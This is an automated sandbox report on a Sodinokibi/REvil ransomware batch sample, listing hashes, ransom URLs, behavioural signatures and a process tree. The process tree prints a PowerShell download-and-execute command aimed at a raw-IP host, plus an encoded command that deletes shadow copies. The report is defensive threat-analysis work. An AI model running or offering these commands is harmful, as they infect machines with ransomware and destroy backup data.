Analysis
-
max time kernel
140s -
max time network
147s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
17-05-2020 20:10
Static task
static1
Behavioral task
behavioral1
Sample
df334765cb86900aeb9265c48916c137.bat
Resource
win7v200430
Behavioral task
behavioral2
Sample
df334765cb86900aeb9265c48916c137.bat
Resource
win10v200430
General
-
Target
df334765cb86900aeb9265c48916c137.bat
-
Size
216B
-
MD5
a5ab635f123ce58648141c6dfd2b8c99
-
SHA1
da19de350a515c434870a6493a1d7484cb5f64df
-
SHA256
ec1d6ba7554a54f9a7f29c8d80402ca165daad5f17549536d444fd0308adf769
-
SHA512
e69b7a51700f56cb940b3fba88e836a799cbbd61be6a57199ed18161a2096a688effd8c2a20409022791ee2c28ec1037c908eb338763bf43f53d5809eeeff691
Malware Config
Extracted
http://185.103.242.78/pastes/df334765cb86900aeb9265c48916c137
Extracted
C:\8at2a4-read-me.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/B9C760F0E8C9E902
http://decryptor.cc/B9C760F0E8C9E902
Signatures
-
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\sfb2296.bmp" powershell.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\System32\CatRoot2\dberr.txt powershell.exe -
Processes:
powershell.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 powershell.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde powershell.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 powershell.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 430000000100000000000000040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f007400200043004100200058003300000020000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 powershell.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Enumerates connected drives 3 TTPs
-
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1480 powershell.exe Token: SeDebugPrivilege 1480 powershell.exe Token: SeDebugPrivilege 1688 powershell.exe Token: SeBackupPrivilege 1592 vssvc.exe Token: SeRestorePrivilege 1592 vssvc.exe Token: SeAuditPrivilege 1592 vssvc.exe Token: SeTakeOwnershipPrivilege 1480 powershell.exe -
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Suspicious behavior: EnumeratesProcesses 77 IoCs
Processes:
powershell.exepowershell.exepid process 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1688 powershell.exe 1688 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe -
Blacklisted process makes network request 70 IoCs
Processes:
powershell.exeflow pid process 2 1480 powershell.exe 6 1480 powershell.exe 7 1480 powershell.exe 10 1480 powershell.exe 12 1480 powershell.exe 14 1480 powershell.exe 15 1480 powershell.exe 17 1480 powershell.exe 18 1480 powershell.exe 20 1480 powershell.exe 21 1480 powershell.exe 23 1480 powershell.exe 25 1480 powershell.exe 26 1480 powershell.exe 28 1480 powershell.exe 29 1480 powershell.exe 31 1480 powershell.exe 32 1480 powershell.exe 34 1480 powershell.exe 36 1480 powershell.exe 39 1480 powershell.exe 41 1480 powershell.exe 42 1480 powershell.exe 44 1480 powershell.exe 46 1480 powershell.exe 48 1480 powershell.exe 49 1480 powershell.exe 51 1480 powershell.exe 52 1480 powershell.exe 54 1480 powershell.exe 56 1480 powershell.exe 58 1480 powershell.exe 60 1480 powershell.exe 62 1480 powershell.exe 63 1480 powershell.exe 65 1480 powershell.exe 67 1480 powershell.exe 68 1480 powershell.exe 70 1480 powershell.exe 72 1480 powershell.exe 74 1480 powershell.exe 75 1480 powershell.exe 77 1480 powershell.exe 78 1480 powershell.exe 80 1480 powershell.exe 82 1480 powershell.exe 84 1480 powershell.exe 86 1480 powershell.exe 87 1480 powershell.exe 89 1480 powershell.exe 90 1480 powershell.exe 92 1480 powershell.exe 94 1480 powershell.exe 96 1480 powershell.exe 97 1480 powershell.exe 99 1480 powershell.exe 100 1480 powershell.exe 102 1480 powershell.exe 104 1480 powershell.exe 106 1480 powershell.exe 107 1480 powershell.exe 109 1480 powershell.exe 111 1480 powershell.exe 112 1480 powershell.exe -
Drops file in Program Files directory 26 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\ConvertFromAdd.vsx powershell.exe File opened for modification \??\c:\program files\DismountDebug.xltx powershell.exe File opened for modification \??\c:\program files\SearchBlock.vb powershell.exe File opened for modification \??\c:\program files\SwitchUpdate.midi powershell.exe File opened for modification \??\c:\program files\UnlockInstall.ods powershell.exe File opened for modification \??\c:\program files\UnregisterComplete.xht powershell.exe File opened for modification \??\c:\program files\WatchResize.vstx powershell.exe File created \??\c:\program files (x86)\8at2a4-read-me.txt powershell.exe File opened for modification \??\c:\program files\EnterRevoke.avi powershell.exe File opened for modification \??\c:\program files\ExportSkip.dotm powershell.exe File opened for modification \??\c:\program files\InitializeRestart.dib powershell.exe File opened for modification \??\c:\program files\LimitCopy.xlsb powershell.exe File created \??\c:\program files\microsoft sql server compact edition\8at2a4-read-me.txt powershell.exe File opened for modification \??\c:\program files\GetMove.ttf powershell.exe File opened for modification \??\c:\program files\InitializeCompare.mpeg2 powershell.exe File opened for modification \??\c:\program files\InitializeShow.au powershell.exe File opened for modification \??\c:\program files\ResumeSync.mp4v powershell.exe File opened for modification \??\c:\program files\TraceSet.m4a powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\8at2a4-read-me.txt powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\8at2a4-read-me.txt powershell.exe File created \??\c:\program files\8at2a4-read-me.txt powershell.exe File opened for modification \??\c:\program files\BackupCompare.eprtx powershell.exe File opened for modification \??\c:\program files\MoveRedo.asp powershell.exe File opened for modification \??\c:\program files\NewImport.inf powershell.exe File opened for modification \??\c:\program files\OptimizeEdit.svg powershell.exe File opened for modification \??\c:\program files\ResumeEdit.vsx powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1480 powershell.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 1312 wrote to memory of 1480 1312 cmd.exe powershell.exe PID 1480 wrote to memory of 1688 1480 powershell.exe powershell.exe PID 1480 wrote to memory of 1688 1480 powershell.exe powershell.exe PID 1480 wrote to memory of 1688 1480 powershell.exe powershell.exe PID 1480 wrote to memory of 1688 1480 powershell.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\df334765cb86900aeb9265c48916c137.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1312 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/df334765cb86900aeb9265c48916c137');Invoke-ADDYUVRSM;Start-Sleep -s 10000"2⤵
- Sets desktop wallpaper using registry
- Drops file in System32 directory
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Drops file in Program Files directory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
PID:1480 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:1688
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
- Modifies service
PID:1592